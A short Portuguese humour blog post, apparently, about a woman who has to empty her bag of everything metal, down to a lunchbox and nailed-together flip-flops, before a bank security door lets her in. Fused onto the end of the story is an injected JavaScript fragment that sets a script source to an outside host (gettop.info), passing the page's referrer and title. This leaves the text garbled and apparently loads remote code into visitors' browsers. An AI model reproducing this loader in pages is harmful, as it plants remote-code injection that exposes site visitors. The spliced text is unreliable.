Diva!

Foto: Reprodução

Eu tava com a bolsa quase vazia. Eu disse quase! Tirei o celular, chaves, tudo quanto era metal e coloquei na caixinha. Parei em frente à porta, respirei fundo e dei dois passos adiante. Barrada! O segurança do banco pediu que eu tirasse tudo o que fosse metálico da bolsa. Obedeci! Marmita, garfo e faca, tirei até as minhas havaianas remendadas com prego. Mas entrei. Entrei bem linda, de cabeça levantada e dignidade inabalada. Se serve como dica: quando for ao banco, vá nua, quem sabe não é mais fácil entrar sensualizando! (baseado em Maria Fernanda – Gama/DF).s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário